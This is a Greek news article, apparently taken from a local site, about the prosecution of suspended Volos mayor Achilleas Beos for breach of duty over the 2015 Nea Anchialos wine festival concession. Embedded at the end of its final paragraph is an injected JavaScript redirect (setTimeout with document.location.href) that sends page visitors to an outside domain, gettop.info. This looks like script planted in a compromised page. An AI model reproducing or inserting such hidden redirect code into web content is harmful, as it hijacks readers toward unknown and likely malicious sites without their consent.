Ποινική δίωξη κατά του Αχιλλεά Μπέου

0
5

 

Ποινική δίωξη για παράβαση καθήκοντος κατά του εν αργία δημάρχου Βόλου Αχιλλέα Μπέου άσκησε η Εισαγγελία Πλημμελειοδικών Βόλου, για την διοργάνωση της Γιορτής Κρασιού της Ν.Αγχιάλου το καλοκαίρι του 2015.

Σύμφωνα με το magnesianews.gr, για την υπόθεση είχε διενεργηθεί προκαταρκτική εξέταση από την Εισαγγελία στην οποία είχαν κληθεί να καταθέσουν όλοι οι σύμβουλοι του Δημοτικού Συμβουλίου Βόλου ως υπεύθυνοι για την απόφαση που έχει λάβει ομόφωνα το Δημοτικό Συμβούλιο Βόλου, για την παραχώρηση στους φορείς: α) ΑΝ.Ε.ΒΟ. Α.Ε β) Αγροτικό Παραγωγικό Συνεταιρισµό Νέας Αγχιάλου «∆ΗΜΗΤΡΑ» γ) Φιλοπρόοδο Σύλλογο Νέας Αγχιάλου δ) Σύλλογο των εν Θεσσαλία Οξυωτών Νέας Αγχιάλου ε) Αθλητικό Σύλλογο «ΠΥΡΑΣΟΣ» στ) Αθλητικό Σύλλογο «Φθιώτιδες Θήβες – Αγχίαλος» η) Ένωση Επαγγελµατιών Επιχειρήσεων Υγειονοµικού Ενδιαφέροντος θ) Αθλητικό Πολιτιστικό Σύλλογο «Η ΝΕΑ ΑΓΧΙΑΛΟΣ» του χώρου της γιορτής κρασιού προκειµένου να διοργανώσoυν και πραγµατοποιήσουν τη Γιορτή Κρασιού έτους 2015 στο χρονικό διάστηµα από 13 έως 16 Αυγούστου 2015, αναθέτοντας εν συνεχεία στον Δήμαρχο Βόλου να προβεί στις περαιτέρω ενέργειες.

Η Αποκεντρωμένη Διοίκηση Θεσσαλίας είχε κρίνει παράνομη την με αριθμό 425/2015 απόφαση του Δημοτικού Συμβουλίου Βόλου για την συγκεκριμένη παραχώρηση, ωστόσο ο Δήμος Βόλου προχώρησε κανονικά στην υλοποίησή της. Μετά από έγγραφη ανώνυμη καταγγελία που έγινε ωστόσο, ακολούθησε η προκαταρκτική εξέταση η οποία ολοκληρώθηκε και είχε ως αποτέλεσμα να απαλλαγούν οι 48 δημοτικοί σύμβουλοι και να παραπεμφθεί σε δίκη στις 17 Μαΐου 2017 ο εν ενεργεία, εκείνη την περίοδο, δήμαρχος Βόλου Αχιλλέας Μπέος.

Να σημειωθεί ότι παράνομες έχουν κριθεί και οι αποφάσεις παραχώρησης για την διοργάνωση της Γιορτής Κρασιού 2016, και για την παραχώρηση της πλατείας Πανεπιστημίου το 2015, καθώς και για την παραχώρηση της πλατείας Ρήγα Φεραίου όπου φέτος θα λειτουργήσει το «Χωριό του Αη Βασίλη». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here